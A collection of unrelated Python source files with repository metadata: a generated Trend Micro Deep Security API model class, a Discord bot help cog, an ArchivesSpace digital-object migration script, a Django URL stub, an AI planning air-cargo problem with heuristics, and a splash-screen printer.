| 2020-04-03T22:53:11.692909
| 2018-10-31T23:40:47
| 2018-10-31T23:40:47
| 155,612,514
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,780
|
py
|
# coding: utf-8
"""
Trend Micro Deep Security API
Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501
OpenAPI spec version: 11.2.225
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class Interface(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'interface_type_id': 'int',
'name': 'str',
'display_name': 'str',
'id': 'int',
'mac': 'str',
'dhcp': 'bool',
'i_ps': 'list[str]'
}
attribute_map = {
'interface_type_id': 'interfaceTypeID',
'name': 'name',
'display_name': 'displayName',
'id': 'ID',
'mac': 'MAC',
'dhcp': 'DHCP',
'i_ps': 'IPs'
}
def __init__(self, interface_type_id=None, name=None, display_name=None, id=None, mac=None, dhcp=None, i_ps=None): # noqa: E501
"""Interface - a model defined in Swagger""" # noqa: E501
self._interface_type_id = None
self._name = None
self._display_name = None
self._id = None
self._mac = None
self._dhcp = None
self._i_ps = None
self.discriminator = None
if interface_type_id is not None:
self.interface_type_id = interface_type_id
if name is not None:
self.name = name
if display_name is not None:
self.display_name = display_name
if id is not None:
self.id = id
if mac is not None:
self.mac = mac
if dhcp is not None:
self.dhcp = dhcp
if i_ps is not None:
self.i_ps = i_ps
@property
def interface_type_id(self):
"""Gets the interface_type_id of this Interface. # noqa: E501
ID of the InterfaceType to which the Interface is mapped. # noqa: E501
:return: The interface_type_id of this Interface. # noqa: E501
:rtype: int
"""
return self._interface_type_id
@interface_type_id.setter
def interface_type_id(self, interface_type_id):
"""Sets the interface_type_id of this Interface.
ID of the InterfaceType to which the Interface is mapped. # noqa: E501
:param interface_type_id: The interface_type_id of this Interface. # noqa: E501
:type: int
"""
self._interface_type_id = interface_type_id
@property
def name(self):
"""Gets the name of this Interface. # noqa: E501
Name of the Interface. Set automatically by the DSM. # noqa: E501
:return: The name of this Interface. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this Interface.
Name of the Interface. Set automatically by the DSM. # noqa: E501
:param name: The name of this Interface. # noqa: E501
:type: str
"""
self._name = name
@property
def display_name(self):
"""Gets the display_name of this Interface. # noqa: E501
Display name of the Interface. Optionally set by the user. # noqa: E501
:return: The display_name of this Interface. # noqa: E501
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""Sets the display_name of this Interface.
Display name of the Interface. Optionally set by the user. # noqa: E501
:param display_name: The display_name of this Interface. # noqa: E501
:type: str
"""
self._display_name = display_name
@property
def id(self):
"""Gets the id of this Interface. # noqa: E501
ID of the Interface. # noqa: E501
:return: The id of this Interface. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this Interface.
ID of the Interface. # noqa: E501
:param id: The id of this Interface. # noqa: E501
:type: int
"""
self._id = id
@property
def mac(self):
"""Gets the mac of this Interface. # noqa: E501
MAC Address of the interface. # noqa: E501
:return: The mac of this Interface. # noqa: E501
:rtype: str
"""
return self._mac
@mac.setter
def mac(self, mac):
"""Sets the mac of this Interface.
MAC Address of the interface. # noqa: E501
:param mac: The mac of this Interface. # noqa: E501
:type: str
"""
self._mac = mac
@property
def dhcp(self):
"""Gets the dhcp of this Interface. # noqa: E501
Indicates whether the interface uses DHCP. The value is true if it uses DHCP. # noqa: E501
:return: The dhcp of this Interface. # noqa: E501
:rtype: bool
"""
return self._dhcp
@dhcp.setter
def dhcp(self, dhcp):
"""Sets the dhcp of this Interface.
Indicates whether the interface uses DHCP. The value is true if it uses DHCP. # noqa: E501
:param dhcp: The dhcp of this Interface. # noqa: E501
:type: bool
"""
self._dhcp = dhcp
@property
def i_ps(self):
"""Gets the i_ps of this Interface. # noqa: E501
List of IPs used by the interface. # noqa: E501
:return: The i_ps of this Interface. # noqa: E501
:rtype: list[str]
"""
return self._i_ps
@i_ps.setter
def i_ps(self, i_ps):
"""Sets the i_ps of this Interface.
List of IPs used by the interface. # noqa: E501
:param i_ps: The i_ps of this Interface. # noqa: E501
:type: list[str]
"""
self._i_ps = i_ps
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Interface):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"brendanj@US-BRENDANJ-MAC.local"
] |
brendanj@US-BRENDANJ-MAC.local
|
69dacb4f5f1477c11add891b9db600180cf21595
|
d45b5fed94ebcce2757142498023fa6bae9c1f4d
|
/cogs/customhelp.py
|
41cae4e56c08920c35a1869427018e5aa5c041a6
|
[] |
no_license
|
Some1NamedNate/Inkxbot
|
56ed79cef68bc45bbe1b8b24369b03ed932254b3
|
d12555daca7f484b26b4502e5c760a97dd897909
|
HEAD
| 2018-09-01T13:40:54.546502
| 2018-06-04T00:04:15
| 2018-06-04T00:04:15
| 110,290,139
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,958
|
py
|
import discord
from discord.ext import commands
from discord.ext.commands import formatter
import sys
import re
import inspect
import itertools
import traceback
empty = u'\u200b'
_mentions_transforms = {
'@everyone': '@\u200beveryone',
'@here': '@\u200bhere'
}
def rewrite():
return discord.version_info.major == 1
_mention_pattern = re.compile('|'.join(_mentions_transforms.keys()))
orig_help = None
class Help(formatter.HelpFormatter):
"""Formats help for commands."""
def __init__(self, bot, *args, **kwargs):
self.bot = bot
global orig_help
orig_help = bot.get_command('help')
self.bot.remove_command('help')
self.bot.formatter = self
self.bot.help_formatter = self
super().__init__(*args, **kwargs)
# Shortcuts that allow cog to run on 0.16.8 and 1.0.0a
def pm_check(self, ctx):
if rewrite():
return isinstance(ctx.channel, discord.DMChannel)
else:
return ctx.message.channel.is_private
@property
def me(self):
if rewrite():
return self.context.me
else:
return self.context.message.server.me
@property
def bot_all_commands(self):
if rewrite():
return self.bot.all_commands
else:
return self.bot.commands
@property
def avatar(self):
if rewrite():
return self.bot.user.avatar_url_as(format='png')
else:
return self.bot.user.avatar_url # TODO: I really don't like not having a PNG
@property
def color(self):
if self.pm_check(self.context):
return 0
else:
return self.me.color
async def send(self, dest, content=None, embed=None):
if rewrite():
await dest.send(content=content, embed=embed)
else:
await self.bot.send_message(dest, content=content, embed=embed)
# All the other shit
@property
def author(self):
# Get author dict with username if PM and display name in guild
if self.pm_check(self.context):
name = self.bot.user.name
else:
name = self.me.display_name if not '' else self.bot.user.name
author = {
'name': '{0} Help Manual'.format(name),
'icon_url': self.avatar
}
return author
@property
def destination(self):
return self.context.message.author if self.bot.pm_help else self.context.message.channel
def _add_subcommands(self, cmds):
entries = ''
for name, command in cmds:
if name in command.aliases:
# skip aliases
continue
if self.is_cog() or self.is_bot():
name = '{0}{1}'.format(self.clean_prefix, name)
entries += '**{0}** {1}\n'.format(name, command.short_doc)
return entries
def get_ending_note(self):
# command_name = self.context.invoked_with
return "Type {0}help <command> for more info on a command.\n" \
"You can also type {0}help <category> for more info on a category.".format(self.clean_prefix)
async def format(self, ctx, command):
"""Formats command for output.
Returns a dict used to build embed"""
# All default values for embed dict
self.command = command
self.context = ctx
emb = {
'embed': {
'title': '',
'description': '',
},
'footer': {
'text': self.get_ending_note()
},
'fields': []
}
description = command.description if not self.is_cog() else inspect.getdoc(command)
if not description == '' and description is not None:
description = '*{0}*'.format(description)
if description:
# <description> portion
emb['embed']['description'] = description
if isinstance(command, discord.ext.commands.core.Command):
# <signature portion>
emb['embed']['title'] = emb['embed']['description']
emb['embed']['description'] = '`Syntax: {0}`'.format(self.get_command_signature())
# <long doc> section
if command.help:
name = '__{0}__'.format(command.help.split('\n\n')[0])
name_length = len(name) - 4
value = command.help[name_length:].replace('[p]', self.clean_prefix)
if value == '':
value = empty
field = {
'name': name,
'value': value,
'inline': False
}
emb['fields'].append(field)
# end it here if it's just a regular command
if not self.has_subcommands():
return emb
def category(tup):
# Turn get cog (Category) name from cog/list tuples
cog = tup[1].cog_name
return '**__{0}:__**'.format(cog) if cog is not None else '**__\u200bNo Category:__**'
# Get subcommands for bot or category
if rewrite():
filtered = await self.filter_command_list()
else:
filtered = self.filter_command_list()
if self.is_bot():
# Get list of non-hidden commands for bot.
data = sorted(filtered, key=category)
for category, commands in itertools.groupby(data, key=category):
# there simply is no prettier way of doing this.
field = {
'inline': False
}
commands = sorted(commands)
if len(commands) > 0:
field['name'] = category
field['value'] = self._add_subcommands(commands) # May need paginated
emb['fields'].append(field)
else:
# Get list of commands for category
filtered = sorted(filtered)
if filtered:
field = {
'name': '**__Commands:__**' if not self.is_bot() and self.is_cog() else '**__Subcommands:__**',
'value': self._add_subcommands(filtered), # May need paginated
'inline': False
}
emb['fields'].append(field)
return emb
async def format_help_for(self, ctx, command_or_bot, reason: str=None):
"""Formats the help page and handles the actual heavy lifting of how ### WTF HAPPENED?
the help command looks like. To change the behaviour, override the
:meth:`~.HelpFormatter.format` method.
Parameters
-----------
ctx: :class:`.Context`
The context of the invoked help command.
command_or_bot: :class:`.Command` or :class:`.Bot`
The bot or command that we are getting the help of.
Returns
--------
list
A paginated output of the help command.
"""
self.context = ctx
self.command = command_or_bot
emb = await self.format(ctx, command_or_bot)
if reason:
emb['embed']['title'] = "{0}".format(reason)
embed = discord.Embed(color=self.color, **emb['embed'])
embed.set_author(**self.author)
for field in emb['fields']:
embed.add_field(**field)
embed.set_footer(**emb['footer'])
await self.send(self.destination, embed=embed)
def simple_embed(self, title=None, description=None, color=None, author=None):
# Shortcut
embed = discord.Embed(title=title, description=description, color=color)
embed.set_footer(text=self.bot.formatter.get_ending_note())
if author:
embed.set_author(**author)
return embed
def cmd_not_found(self, cmd, color=0):
# Shortcut for a shortcut. Sue me
embed = self.simple_embed(title=self.bot.command_not_found.format(cmd),
description='Commands are case sensitive. Please check your spelling and try again',
color=color, author=self.author)
return embed
@commands.command(name='help', pass_context=True, hidden=True)
async def help(self, ctx, *cmds: str):
"""Shows help documentation.
[p]**help**: Shows the help manual.
[p]**help** command: Show help for a command
[p]**help** Category: Show commands and description for a category"""
self.context = ctx
def repl(obj):
return _mentions_transforms.get(obj.group(0), '')
# help by itself just lists our own commands.
if len(cmds) == 0:
await self.bot.formatter.format_help_for(ctx, self.bot)
return
elif len(cmds) == 1:
# try to see if it is a cog name
name = _mention_pattern.sub(repl, cmds[0])
command = None
if name in self.bot.cogs:
command = self.bot.cogs[name]
else:
command = self.bot_all_commands.get(name)
if command is None:
await self.send(self.destination, embed=self.cmd_not_found(name, self.color))
return
await self.bot.formatter.format_help_for(ctx, command)
else:
name = _mention_pattern.sub(repl, cmds[0])
command = self.bot_all_commands.get(name)
if command is None:
await self.send(self.destination, embed=self.cmd_not_found(name, self.color))
return
for key in cmds[1:]:
try:
key = _mention_pattern.sub(repl, key)
command = command.all_commands.get(key)
if command is None:
await self.send(self.destination, embed=self.cmd_not_found(key, self.color))
return
except AttributeError:
await self.send(self.destination,
embed=self.simple_embed(title=
'Command "{0.name}" has no subcommands.'.format(command),
color=self.color,
author=self.author))
return
await self.bot.formatter.format_help_for(ctx, command)
@help.error
async def help_error(self, error, ctx):
await self.send(self.destination, '{0.__name__}: {1}'.format(type(error), error))
traceback.print_tb(error.original.__traceback__, file=sys.stderr)
def __unload(self):
print('called __unload')
self.bot.formatter = formatter.HelpFormatter()
self.bot.add_command(orig_help)
def setup(bot):
bot.add_cog(Help(bot))
|
[
"inkxthesquid@mail.com"
] |
inkxthesquid@mail.com
|
8090c20bccf212d15cf84a33921731317bd42fbf
|
969675dd8c44c5897f9113d982e87b08bd38353f
|
/EAD/aspace_migration/post_digital_objects.py
|
285df46dceac1f2046fdccfcbb5a30a3bade53d9
|
[] |
no_license
|
bentley-historical-library/archivesspace_migration
|
571b087dae3457329d4157351e7d037454550192
|
84b508f4f14aeb84b0efeebf4c00532122972771
|
refs/heads/master
| 2016-08-11T21:49:03.958670
| 2016-04-04T12:53:43
| 2016-04-04T12:53:43
| 52,303,628
| 0
| 1
| null | 2016-04-04T12:53:44
| 2016-02-22T20:34:02
|
Python
|
UTF-8
|
Python
| false
| false
| 9,556
|
py
|
import requests
from lxml import etree
import os
from os.path import join
import json
import re
import csv
import urlparse
import urllib2
import uuid
import getpass
import time
def post_digital_objects(ead_dir, digital_objects_dir, dspace_mets_dir, aspace_url, username, password,delete_csvs=False):
if not os.path.exists(digital_objects_dir):
os.makedirs(digital_objects_dir)
posted_objects = join(digital_objects_dir, 'posted_digital_objects.csv')
error_file = join(digital_objects_dir, 'digital_object_errors.txt')
skipped_items_file = join(digital_objects_dir, 'skipped_items.txt')
if delete_csvs:
for csvfile in [posted_objects, error_file, skipped_items_file]:
if os.path.exists(csvfile):
os.remove(csvfile)
already_posted = []
if os.path.exists(posted_objects):
with open(posted_objects,'rb') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
href = row[0]
if href not in already_posted:
already_posted.append(href)
auth = requests.post(aspace_url+'/users/'+username+'/login?password='+password+'&expiring=false').json()
session = auth['session']
headers = {'X-ArchivesSpace-Session':session}
# Iterate through EADs. If you find a dao href that is a DSpace handle, open the METS from the dspace_mets folder
# Assemble the digital object and the components as such:
# Digital object title == EAD component title and dates
# Digital object identifer and file version uri == dao href
# Digital object component titles = Titles from METS
# Digital object component labels == Labels from METS
# First, post the digital object
# Then, grab the uri from the posted digital object to set as the parent for each component and post those
posted_dig_objs = {}
skipped_items = []
for filename in os.listdir(ead_dir):
print "Posting digital objects from {0}".format(filename)
tree = etree.parse(join(ead_dir,filename))
daos = tree.xpath('//dao')
for dao in daos:
did = dao.getparent()
href = dao.attrib['href'].strip()
# TO DO -- Account for the same href showing up in different places
if 'show' in dao.attrib:
show = dao.attrib['show']
else:
show = 'new'
if 'actuate' in dao.attrib:
actuate = dao.attrib['actuate']
else:
actuate = 'onRequest'
xlink_actuate = actuate.replace('request','Request').replace('load','Load')
if href.startswith('http://hdl.handle.net/2027.42') and href not in already_posted:
handlepath = urlparse.urlparse(href).path
the_id = handlepath.split('/')[-1]
if the_id + '.xml' in os.listdir(dspace_mets_dir):
print "Parsing DSpace METS for", href
metstree = etree.parse(join(dspace_mets_dir, the_id + '.xml'))
ns = {'mets':'http://www.loc.gov/METS/','dim': 'http://www.dspace.org/xmlns/dspace/dim','xlink':'http://www.w3.org/TR/xlink/'}
XLINK = 'http://www.w3.org/TR/xlink/'
daodesc = dao.xpath('./daodesc/p')
if daodesc:
digital_object_note = re.sub(r'^\[|\]$','',daodesc[0].text)
else:
digital_object_note = False
if did.xpath('./unittitle'):
component_title = etree.tostring(did.xpath('./unittitle')[0])
else:
component_title = 'OOPS THERES NO TITLE HERE'
digital_object_title = re.sub(r'<(.*?)>','',component_title)
digital_object = {}
digital_object_components = []
digital_object['title'] = digital_object_title.strip()
digital_object['digital_object_id'] = str(uuid.uuid4())
digital_object['publish'] = True
digital_object['file_versions'] = [{'file_uri':href,'xlink_show_attribute':show,'xlink_actuate_attribute':xlink_actuate}]
if digital_object_note:
digital_object['notes'] = [{'type':'note','publish':True,'content':[digital_object_note],'jsonmodel_type':'note_digital_object'}]
digital_object_post = requests.post(aspace_url+'/repositories/2/digital_objects',headers=headers,data=json.dumps(digital_object)).json()
print digital_object_post
if 'error' in digital_object_post:
with open(error_file,'a') as f:
f.write(digital_object_post)
digital_object_uri = digital_object_post['uri']
with open(posted_objects,'ab') as csvfile:
writer = csv.writer(csvfile)
writer.writerow([href,digital_object_uri])
posted_dig_objs[href] = digital_object_uri
fileGrp = metstree.xpath("//mets:fileGrp[@USE='CONTENT']",namespaces=ns)[0]
bitstreams = fileGrp.xpath('.//mets:file',namespaces=ns)
position = 0
for bitstream in bitstreams:
FLocat = bitstream.xpath('./mets:FLocat',namespaces=ns)[0]
# This was originally being added to each file_version as file_size_bytes, but the max integer allowed is 2,147,483,647
# Still storing this for now in case we want to turn it into something else (like an extent) later
component_size = bitstream.attrib['SIZE']
if '{%s}label' % (XLINK) in FLocat.attrib:
component_label = FLocat.attrib['{%s}label' % (XLINK)].strip()[:255]
else:
component_label = None
component_href = 'http://deepblue.lib.umich.edu' + FLocat.attrib['{%s}href' % (XLINK)]
component_title = FLocat.attrib['{%s}title' % (XLINK)].strip()
digital_object_component = {
'digital_object':{'ref':digital_object_uri},
'title':component_title,
'label':component_label,
'position':position,
'file_versions':[{'file_uri':component_href}],
}
digital_object_components.append(digital_object_component)
position += 1
for component in digital_object_components:
digital_object_component_post = requests.post(aspace_url+'/repositories/2/digital_object_components',headers=headers,data=json.dumps(component)).json()
print digital_object_component_post
if 'error' in digital_object_component_post:
with open(error_file,'a') as f:
f.write(digital_object_component_post)
else:
skipped_items.append(href)
with open(skipped_items_file,'a') as f:
f.write(href+'\n')
elif href not in already_posted:
daodesc = dao.xpath('./daodesc/p')
if daodesc:
digital_object_note = re.sub(r'^\[|\]$','',daodesc[0].text)
else:
digital_object_note = False
component_title = etree.tostring(did.xpath('./unittitle')[0])
digital_object_title = re.sub(r'<(.*?)>','',component_title)
digital_object = {}
digital_object['title'] = digital_object_title.strip()
digital_object['digital_object_id'] = str(uuid.uuid4())
digital_object['publish'] = True
digital_object['file_versions'] = [{'file_uri':href,'xlink_show_attribute':show,'xlink_actuate_attribute':xlink_actuate}]
if digital_object_note:
digital_object['notes'] = [{'type':'note','publish':True,'content':[digital_object_note],'jsonmodel_type':'note_digital_object'}]
digital_object_post = requests.post(aspace_url+'/repositories/2/digital_objects',headers=headers,data=json.dumps(digital_object)).json()
print digital_object_post
if 'invalid_object' in digital_object_post:
with open(error_file,'a') as f:
f.write(digital_object_post)
digital_object_uri = digital_object_post['uri']
posted_dig_objs[href] = digital_object_uri
with open(posted_objects,'ab') as csvfile:
writer = csv.writer(csvfile)
writer.writerow([href,digital_object_uri])
def main():
project_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
aspace_ead_dir = join(project_dir, 'eads')
digital_objects_dir = join(project_dir,'digital_objects')
dspace_mets_dir = 'C:/Users/djpillen/GitHub/dspace_mets'
aspace_url = 'http://localhost:8089'
username = 'admin'
password = 'admin'
post_digital_objects(aspace_ead_dir, digital_objects_dir, dspace_mets_dir, aspace_url, username, password)
|
[
"djpillen@umich.edu"
] |
djpillen@umich.edu
|
03c6e0153ad4f0cfa7f2fcabcc34786572fbc82e
|
6f3140e1b0ab08930c31d9f36e85ffbb1b78e92b
|
/apps/teams/urls.py
|
535dc43dbf8e86e0d24523be0305e46b20be5a85
|
[] |
no_license
|
RossLote/propertymanager
|
337660ff05dfe99947873d1ddc3f786372eb41e6
|
d0f30a3156307249a04c4ffaa0eea83b4512b9cd
|
refs/heads/master
| 2021-01-10T15:28:20.396760
| 2016-02-15T09:21:43
| 2016-02-15T09:21:43
| 52,165,971
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 133
|
py
|
from django.conf.urls import url
from . import views
urlpatterns = [
# url(r'^$', views.TeamsListView.as_view(), name='list'),
]
|
[
"rosslote@gmail.com"
] |
rosslote@gmail.com
|
2290f2fe24175f18adb69573d33225ba9b6bbf96
|
fba6e390dd9a91109cb6ee81b418c59d10af9d8a
|
/Implementing a Planning Search/my_air_cargo_problems.py
|
cc089f0ad465fbf332e9ce175743f609cad799bc
|
[] |
no_license
|
ExtremeGenerationIT/Artificial-Intelligence
|
8c5d056ac19cf4656b87ee22d527f1c479c8c596
|
c56db6b4aef69855c3fdc43d392edef7d7044fab
|
refs/heads/master
| 2021-01-21T17:29:56.653106
| 2017-11-26T16:49:42
| 2017-11-26T16:49:42
| 91,956,673
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,868
|
py
|
from aimacode.logic import PropKB
from aimacode.planning import Action
from aimacode.search import (
Node, Problem,
)
from aimacode.utils import expr
from lp_utils import (
FluentState, encode_state, decode_state,
)
from my_planning_graph import PlanningGraph
from functools import lru_cache
class AirCargoProblem(Problem):
def __init__(self, cargos, planes, airports, initial: FluentState, goal: list):
"""
:param cargos: list of str
cargos in the problem
:param planes: list of str
planes in the problem
:param airports: list of str
airports in the problem
:param initial: FluentState object
positive and negative literal fluents (as expr) describing initial state
:param goal: list of expr
literal fluents required for goal test
"""
self.state_map = initial.pos + initial.neg
self.initial_state_TF = encode_state(initial, self.state_map)
Problem.__init__(self, self.initial_state_TF, goal=goal)
self.cargos = cargos
self.planes = planes
self.airports = airports
self.actions_list = self.get_actions()
def get_actions(self):
"""
This method creates concrete actions (no variables) for all actions in the problem
domain action schema and turns them into complete Action objects as defined in the
aimacode.planning module. It is computationally expensive to call this method directly;
however, it is called in the constructor and the results cached in the `actions_list` property.
Returns:
----------
list<Action>
list of Action objects
"""
# TODO create concrete Action objects based on the domain action schema for: Load, Unload, and Fly
# concrete actions definition: specific literal action that does not include variables as with the schema
# for example, the action schema 'Load(c, p, a)' can represent the concrete actions 'Load(C1, P1, SFO)'
# or 'Load(C2, P2, JFK)'. The actions for the planning problem must be concrete because the problems in
# forward search and Planning Graphs must use Propositional Logic
def load_actions():
"""Create all concrete Load actions and return a list
:return: list of Action objects
"""
loads = []
for c in self.cargos:
for p in self.planes:
for a in self.airports:
precond_pos = [expr("At({}, {})".format(c, a)),
expr("At({}, {})".format(p, a)),
]
precond_neg = []
effect_add = [expr("In({}, {})".format(c, p))]
effect_rem = [expr("At({}, {})".format(c, a))]
load = Action(expr("Load({}, {}, {})".format(c, p, a)),
[precond_pos, precond_neg],
[effect_add, effect_rem])
loads.append(load)
return loads
def unload_actions():
"""Create all concrete Unload actions and return a list
:return: list of Action objects
"""
unloads = []
for c in self.cargos:
for p in self.planes:
for a in self.airports:
precond_pos = [expr("In({}, {})".format(c, p)),
expr("At({}, {})".format(p, a)),
]
precond_neg = []
effect_add = [expr("At({}, {})".format(c, a))]
effect_rem = [expr("In({}, {})".format(c, p))]
unload = Action(expr("Unload({}, {}, {})".format(c, p, a)),
[precond_pos, precond_neg],
[effect_add, effect_rem])
unloads.append(unload)
return unloads
def fly_actions():
"""Create all concrete Fly actions and return a list
:return: list of Action objects
"""
flys = []
for fr in self.airports:
for to in self.airports:
if fr != to:
for p in self.planes:
precond_pos = [expr("At({}, {})".format(p, fr)),
]
precond_neg = []
effect_add = [expr("At({}, {})".format(p, to))]
effect_rem = [expr("At({}, {})".format(p, fr))]
fly = Action(expr("Fly({}, {}, {})".format(p, fr, to)),
[precond_pos, precond_neg],
[effect_add, effect_rem])
flys.append(fly)
return flys
return load_actions() + unload_actions() + fly_actions()
def actions(self, state: str) -> list:
""" Return the actions that can be executed in the given state.
:param state: str
state represented as T/F string of mapped fluents (state variables)
e.g. 'FTTTFF'
:return: list of Action objects
"""
possible_actions = []
kb = PropKB()
kb.tell(decode_state(state, self.state_map).pos_sentence())
for action in self.actions_list:
valid_pos = all([pc in kb.clauses for pc in action.precond_pos])
valid_neg = all([pc not in kb.clauses for pc in action.precond_neg])
if valid_pos and valid_neg: possible_actions.append(action)
return possible_actions
def result(self, state: str, action: Action):
""" Return the state that results from executing the given
action in the given state. The action must be one of
self.actions(state).
:param state: state entering node
:param action: Action applied
:return: resulting state after action
"""
# TODO implement
new_state = FluentState([], [])
old_state = decode_state(state, self.state_map)
new_state.pos.extend(f for f in old_state.pos if f not in action.effect_rem)
new_state.pos.extend(f for f in action.effect_add if f not in new_state.pos)
new_state.neg.extend(f for f in old_state.neg if f not in action.effect_add)
new_state.neg.extend(f for f in action.effect_rem if f not in new_state.neg)
return encode_state(new_state, self.state_map)
def goal_test(self, state: str) -> bool:
""" Test the state to see if goal is reached
:param state: str representing state
:return: bool
"""
kb = PropKB()
kb.tell(decode_state(state, self.state_map).pos_sentence())
for clause in self.goal:
if clause not in kb.clauses:
return False
return True
def h_1(self, node: Node):
# note that this is not a true heuristic
h_const = 1
return h_const
@lru_cache(maxsize=8192)
def h_pg_levelsum(self, node: Node):
"""This heuristic uses a planning graph representation of the problem
state space to estimate the sum of all actions that must be carried
out from the current state in order to satisfy each individual goal
condition.
"""
# requires implemented PlanningGraph class
pg = PlanningGraph(self, node.state)
pg_levelsum = pg.h_levelsum()
return pg_levelsum
@lru_cache(maxsize=8192)
def h_ignore_preconditions(self, node: Node):
"""This heuristic estimates the minimum number of actions that must be
carried out from the current state in order to satisfy all of the goal
conditions by ignoring the preconditions required for an action to be
executed.
"""
# TODO implement (see Russell-Norvig Ed-3 10.2.3 or Russell-Norvig Ed-2 11.2)
count = 0
goals = set(self.goal)
actions = self.actions_list[:]
while (goals):
next_node = max(actions, key=lambda x: len([eff for eff in x.effect_add if eff in goals]))
actions.remove(next_node)
goals = goals - set(next_node.effect_add)
count += 1
return count
def air_cargo_p1() -> AirCargoProblem:
cargos = ['C1', 'C2']
planes = ['P1', 'P2']
airports = ['JFK', 'SFO']
pos = [expr('At(C1, SFO)'),
expr('At(C2, JFK)'),
expr('At(P1, SFO)'),
expr('At(P2, JFK)'),
]
neg = [expr('At(C2, SFO)'),
expr('In(C2, P1)'),
expr('In(C2, P2)'),
expr('At(C1, JFK)'),
expr('In(C1, P1)'),
expr('In(C1, P2)'),
expr('At(P1, JFK)'),
expr('At(P2, SFO)'),
]
init = FluentState(pos, neg)
goal = [expr('At(C1, JFK)'),
expr('At(C2, SFO)'),
]
return AirCargoProblem(cargos, planes, airports, init, goal)
def air_cargo_p2() -> AirCargoProblem:
cargos = ['C1', 'C2', 'C3']
planes = ['P1', 'P2', 'P3']
airports = ['JFK', 'SFO', 'ATL']
pos = [expr('At(C1, SFO)'),
expr('At(C2, JFK)'),
expr('At(C3, ATL)'),
expr('At(P1, SFO)'),
expr('At(P2, JFK)'),
expr('At(P3, ATL)'),
]
neg = [
expr('At(C1, JFK)'),
expr('At(C1, ATL)'),
expr('In(C1, P1)'),
expr('In(C1, P2)'),
expr('In(C1, P3)'),
expr('At(C2, SFO)'),
expr('At(C2, ATL)'),
expr('In(C2, P1)'),
expr('In(C2, P2)'),
expr('In(C2, P3)'),
expr('At(C3, SFO)'),
expr('At(C3, JFK)'),
expr('In(C3, P1)'),
expr('In(C3, P2)'),
expr('In(C3, P3)'),
expr('At(P1, JFK)'),
expr('At(P1, ATL)'),
expr('At(P2, SFO)'),
expr('At(P2, ATL)'),
expr('At(P3, SFO)'),
expr('At(P3, JFK)'),
]
init = FluentState(pos, neg)
goal = [expr('At(C1, JFK)'),
expr('At(C2, SFO)'),
expr('At(C3, SFO)'),
]
return AirCargoProblem(cargos, planes, airports, init, goal)
def air_cargo_p3() -> AirCargoProblem:
cargos = ['C1', 'C2', 'C3', 'C4']
planes = ['P1', 'P2']
airports = ['JFK', 'SFO', 'ATL', 'ORD']
pos = [expr('At(C1, SFO)'),
expr('At(C2, JFK)'),
expr('At(C3, ATL)'),
expr('At(C4, ORD)'),
expr('At(P1, SFO)'),
expr('At(P2, JFK)'),
]
neg = [expr('At(C1, JFK)'),
expr('At(C1, ATL)'),
expr('At(C1, ORD)'),
expr('In(C1, P1)'),
expr('In(C1, P2)'),
expr('At(C2, SFO)'),
expr('At(C2, ATL)'),
expr('At(C2, ATL)'),
expr('In(C2, P1)'),
expr('In(C2, P2)'),
expr('At(C3, SFO)'),
expr('At(C3, JFK)'),
expr('At(C3, ORD)'),
expr('In(C3, P1)'),
expr('In(C3, P2)'),
expr('At(C4, SFO)'),
expr('At(C4, JFK)'),
expr('At(C4, ATL)'),
expr('In(C4, P1)'),
expr('In(C4, P2)'),
expr('At(P1, JFK)'),
expr('At(P1, ATL)'),
expr('At(P1, ORD)'),
expr('At(P2, SFO)'),
expr('At(P2, ATL)'),
expr('At(P2, ORD)'),
]
init = FluentState(pos, neg)
goal = [expr('At(C1, JFK)'),
expr('At(C2, SFO)'),
expr('At(C3, JFK)'),
expr('At(C4, SFO)'),
]
return AirCargoProblem(cargos, planes, airports, init, goal)
|
[
"noreply@github.com"
] |
ExtremeGenerationIT.noreply@github.com
|
93fdfd28e2583d1f9ebae34e83d4595222d66227
|
d09b20bfd71c82dd8c19201c2d84254e1ea9a3a7
|
/iotpy/splashscreen.py
|
5fa9a38eb21799cbe14e449c9e329bf7fcbeb3b6
|
[
"MIT"
] |
permissive
|
panManfredini/IOTpy
|
a5790a54ecfcf856feb6be95a41fb9c32eb60fda
|
dbe382d37035b4bd66d76333bf1dcf800af76a43
|
refs/heads/main
| 2023-05-17T17:45:33.263396
| 2021-06-10T09:26:28
| 2021-06-10T09:26:28
| 305,758,389
| 0
| 0
| null | 2020-10-28T18:33:55
| 2020-10-20T15:49:35
|
Python
|
UTF-8
|
Python
| false
| false
| 570
|
py
|
splashscreen = """\n\n
*****************************************
* *
* *
* IOTpy *
* Version 0.3.2 *
* *
*****************************************
"""
def printSplashScreen():
print(splashscreen)
|
[
"pan.manfredini@gmail.com"
] |
pan.manfredini@gmail.com
|
64d4abdb227b51cbc78882cd5754188c72f80b1e
|
